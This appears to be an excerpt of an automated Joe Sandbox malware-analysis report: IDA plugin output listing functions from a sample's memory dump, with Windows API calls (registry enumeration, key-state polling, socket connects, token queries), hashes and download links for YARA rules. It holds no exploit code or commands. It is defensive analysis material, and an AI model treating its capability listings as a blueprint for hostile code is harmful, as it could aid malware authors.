Part of subcall function 00FFE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0102A574,?,?,00000000,00000008), ref: 00FFE699

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: b7a18f4eb7a28b4baf2cedfba44bb357ef6115c28c55111ff114bb07971dd101
Instruction ID: 768325ecf3ce61d126c3deeab0ed575c2a3eb26aaae39b8259e7d13710be75e0
Opcode Fuzzy Hash: b7a18f4eb7a28b4baf2cedfba44bb357ef6115c28c55111ff114bb07971dd101
Instruction Fuzzy Hash: 62517D75A00209DFDB00EFA8C990DEDB7F4BF48310B0480A9FA95AB352DB34E945DB80

Function 01042E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01043C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01042BB5,?,?), ref: 01043C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01042EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01042F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 01042F75
RegCloseKey.ADVAPI32(?,?), ref: 01042FA1
RegCloseKey.ADVAPI32(00000000), ref: 01042FAE

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: b347cd9d6d1d5c00426f43d7db21b21c04749fcea9239263835b60d14085d07c
Instruction ID: 0628f7e7e07757cab2dc0ef75f2da25975cdae6a4bebb293d88adfeb14dea980
Opcode Fuzzy Hash: b347cd9d6d1d5c00426f43d7db21b21c04749fcea9239263835b60d14085d07c
Instruction Fuzzy Hash: 49517A71208244AFD714EF69CC81E6EBBE8FF88304F40486DF59587291DB35E905CB52

Function 0104CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b143ecaf4b00a3910693752c5eb7d68422cc5a51f939683e93412fa7ddfc9564
Instruction ID: 4fb0f895583ee6711fa62f835f58e913d5073dac2406c2d9f25edd11914300c9
Opcode Fuzzy Hash: b143ecaf4b00a3910693752c5eb7d68422cc5a51f939683e93412fa7ddfc9564
Instruction Fuzzy Hash: 0B41A4B9A02114ABF760EFACC984FA9BFA8EB0D350F0501B5F9D9A72D5C735A901C750

Function 01031206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 010312B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 010312DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0103131C

Part of subcall function 00FE936C: __swprintf.LIBCMT ref: 00FE93AB
Part of subcall function 00FE936C: __itow.LIBCMT ref: 00FE93DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 01031341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 01031349

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 0ccb5c62403ebdf5363b0e3da3da30802a88d5cb7bb83b8289e075b8f151372c
Instruction ID: ccb25a4f5507dd76b48434eb98076f534b70f2b21f965caae2827516e8c02c20
Opcode Fuzzy Hash: 0ccb5c62403ebdf5363b0e3da3da30802a88d5cb7bb83b8289e075b8f151372c
Instruction Fuzzy Hash: 46412E35600145DFDF01EF65C9819AEBBF9FF48310B148099E946AB362CB75ED01DB60

Function 00FFB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00FFB64F
ScreenToClient.USER32(00000000,000000FF), ref: 00FFB66C
GetAsyncKeyState.USER32(00000001), ref: 00FFB691
GetAsyncKeyState.USER32(00000002), ref: 00FFB69F

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: a2e1f58f8f108a441f4a82f29d6caa35535dfb020b5767c7697985cf279f21e6
Instruction ID: df7b77a3163eac4aa0b4b9a56b3dcab6fc1b41f5c7a59b149dc1fc1a958d904d
Opcode Fuzzy Hash: a2e1f58f8f108a441f4a82f29d6caa35535dfb020b5767c7697985cf279f21e6
Instruction Fuzzy Hash: A1418371604119FBDF559FA9C844AEDBBB4FF05324F108356F9A4922A0C730A990EF91

Function 0101B358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0101B369
PostMessageW.USER32(?,00000201,00000001), ref: 0101B413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0101B41B
PostMessageW.USER32(?,00000202,00000000), ref: 0101B429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0101B431

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 006e687e1e6869f3ba426b46f6ad0cf69a58ca42b338bc1ff488d7d43278f1b0
Instruction ID: ca6b1602ec232ebffed816a3a0045ead699c9a8bc1a8928bf77d083499f8786a
Opcode Fuzzy Hash: 006e687e1e6869f3ba426b46f6ad0cf69a58ca42b338bc1ff488d7d43278f1b0
Instruction Fuzzy Hash: 6131FF71900219EBDF14CFACD94CADE3BB5EB04319F008229F9A1AB1D5C3B8D920CB90

Function 0101DBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0101DBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0101DBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0101DC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0101DC52
_wcsstr.LIBCMT ref: 0101DC5C

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: f5f450a9d1877a553260903ff138808de31be3b87f570b4715ef3971116c328f
Instruction ID: b3d9c607925ad911bd3956e92f5fe0e5fe93056c72ce14d677e7395f7baa8ed7
Opcode Fuzzy Hash: f5f450a9d1877a553260903ff138808de31be3b87f570b4715ef3971116c328f
Instruction Fuzzy Hash: 9C214C31204109BBE7255FB9DC4CE7F7BE8DF45750F044079F989CA095DAA9DC009360

Function 0101BC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0101BC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0101BCC2
__itow.LIBCMT ref: 0101BCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0101BD00
__itow.LIBCMT ref: 0101BD11

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: f1062c98be008cf2531c4d02aed628ed06a45beca6799d049388d56e39591ba5
Instruction ID: b8032ef167f987e92d9965ce324a9d731973a138e991a5d651a6a989f58bf8b7
Opcode Fuzzy Hash: f1062c98be008cf2531c4d02aed628ed06a45beca6799d049388d56e39591ba5
Instruction Fuzzy Hash: BF21DB75700208BBDB21BE698C45FDE7AB9AF5D750F400064FA85EF181EB7DC90547A1

Function 01026318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00FE50E6: _wcsncpy.LIBCMT ref: 00FE50FA

GetFileAttributesW.KERNEL32(?,?,?,?,010260C3), ref: 01026369
GetLastError.KERNEL32(?,?,?,010260C3), ref: 01026374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,010260C3), ref: 01026388
_wcsrchr.LIBCMT ref: 010263AA

Part of subcall function 01026318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,010260C3), ref: 010263E0

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: b5572f265259dac2d468d17c033024db93e9ff7704b720d16648cb460caf0224
Instruction ID: af7f5947d79e55936973b36545bd0d42d2e982b1b016aa5de17884d5cbd85fa9
Opcode Fuzzy Hash: b5572f265259dac2d468d17c033024db93e9ff7704b720d16648cb460caf0224
Instruction Fuzzy Hash: DF210B3190423557EB22A6789C41FEE33ECAF05760F1480A5F9C5C30D5EBA6D5848754

Function 01038B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0103A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0103A84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 01038BD3
WSAGetLastError.WSOCK32(00000000), ref: 01038BE2
connect.WSOCK32(00000000,?,00000010), ref: 01038BFE

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: 0afbdf165a440a6bd6e2b0e48bd8ace78546be5e4877e4cf9186d420ed5923d5
Instruction ID: 538e843ccd0cfb4926efb68669e6db44d15e8ef78624f6c497d67b0108b1b064
Opcode Fuzzy Hash: 0afbdf165a440a6bd6e2b0e48bd8ace78546be5e4877e4cf9186d420ed5923d5
Instruction Fuzzy Hash: 8E2193313001159FDB14AF68CD45F7E77ECAF88720F048599FA96973D2DBB8A8018751

Function 01038420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 01038441
GetForegroundWindow.USER32 ref: 01038458
GetDC.USER32(00000000), ref: 01038494
GetPixel.GDI32(00000000,?,00000003), ref: 010384A0
ReleaseDC.USER32(00000000,00000003), ref: 010384DB

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: eb8c9dcb1f5f6e24d43b5ab2b327c8c0087706dbe69efdc7b251bde06a1639d4
Instruction ID: 5e89edbe1f5ff12271903f207c5eab6e05a9a8fa5e4d371ac17574e8ac2a3d9e
Opcode Fuzzy Hash: eb8c9dcb1f5f6e24d43b5ab2b327c8c0087706dbe69efdc7b251bde06a1639d4
Instruction Fuzzy Hash: AD21A135B00204AFD710DFA5DC84AAEBBE9EF88301F048479F98A97651DE75AC00DB60

Function 00FFAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00FFAFE3
SelectObject.GDI32(?,00000000), ref: 00FFAFF2
BeginPath.GDI32(?), ref: 00FFB009
SelectObject.GDI32(?,00000000), ref: 00FFB033

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7fc0fa4cdc1ba2f6721cbeb3387cdeac7d587790d098143495599986b9ec4c15
Instruction ID: f486c577299bea1f76e7b847986b127c046b9ea9f72da51aca446f776522c54b
Opcode Fuzzy Hash: 7fc0fa4cdc1ba2f6721cbeb3387cdeac7d587790d098143495599986b9ec4c15
Instruction Fuzzy Hash: 5A21F5B4900709EFDB30DF95E8487AA7B68BF183A1F58431AF5A4D60E4D77A4881DF90

Function 0100217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 010021A9
CreateThread.KERNEL32(?,?,010022DF,00000000,?,?), ref: 010021ED
GetLastError.KERNEL32 ref: 010021F7
_free.LIBCMT ref: 01002200
__dosmaperr.LIBCMT ref: 0100220B

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: ee6a5e206a2e5b6f1a15b12af087f519bb26aabaf70f98c16853961172fae99e
Instruction ID: f4b6db94b5c8d137838ea16143e561fe339b6c11b5a42a64a61936a1dbf5eeab
Opcode Fuzzy Hash: ee6a5e206a2e5b6f1a15b12af087f519bb26aabaf70f98c16853961172fae99e
Instruction Fuzzy Hash: DF11E532200347AFBB23AEE99C44DDB3B99EF55760F100429FAD4861C0DB31D46187A0

Function 0101ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0101ABD7
GetLastError.KERNEL32(?,0101A69F,?,?,?), ref: 0101ABE1
GetProcessHeap.KERNEL32(00000008,?,?,0101A69F,?,?,?), ref: 0101ABF0
HeapAlloc.KERNEL32(00000000,?,0101A69F,?,?,?), ref: 0101ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0101AC0E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 457be0c732d9cf9d28325abe85a1aab316b63a7853e332de09012affe2f6c824
Instruction ID: 200570552dad86c4037c2dcc78e23e224d1093220abdec19df37954074119b17
Opcode Fuzzy Hash: 457be0c732d9cf9d28325abe85a1aab316b63a7853e332de09012affe2f6c824
Instruction Fuzzy Hash: 99016970301249FFEB214FAADC58DAB3BACEF8A2547100469F9C6C7265DA76CC40CB60

Function 01027A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 01027A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01027A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 01027A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01027A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 01027AD0

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: d5d0dfdeecedc3513b150bc3d91f4198ff5d110d121ea973fec14261b5238f8c
Instruction ID: 552e999ed5c6b3d1c5fabd6bc991acfcf29fd91d248b6f87c5a03fed0850598a
Opcode Fuzzy Hash: d5d0dfdeecedc3513b150bc3d91f4198ff5d110d121ea973fec14261b5238f8c
Instruction Fuzzy Hash: A6018C31D01629EBCF20AFE9D848ADDBB78FF58321F040086D5C2B2154DB359650C7A1

Function 01019ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 01019ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 01019AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 01019B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 01019B15
CLSIDFromString.OLE32(?,?), ref: 01019B21

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 4ca5afb7dc5b58da26336d609264737ecb96c410370a2e67ceb3d81f8f3c9f6f
Instruction ID: b05ce323a4f27dca053633e4212300ee0ef2a6c84cae715e48d86a5e3d59b222
Opcode Fuzzy Hash: 4ca5afb7dc5b58da26336d609264737ecb96c410370a2e67ceb3d81f8f3c9f6f
Instruction Fuzzy Hash: 45018F76700205BFDB204F98DD98B9A7EEDEB48395F548024FA89D2214D77AD9019BA0

Function 0101AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0101AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0101AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0101AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0101AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101AAAF

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3557d5392fc146254871dfecbef46a7a9c6588e4027cc4506f89bb615af62a34
Instruction ID: 7abf5d606936bdd7ecc4ba6937e4ef512b96af13ff74cfee908c534971a3285f
Opcode Fuzzy Hash: 3557d5392fc146254871dfecbef46a7a9c6588e4027cc4506f89bb615af62a34
Instruction Fuzzy Hash: D1F0AF32301244BFEB211EE9AC88F773BACFF4A654B000019FAC1C7194DB6AD8018B70

Function 0101AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0101AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0101AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0101AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0101AAFA
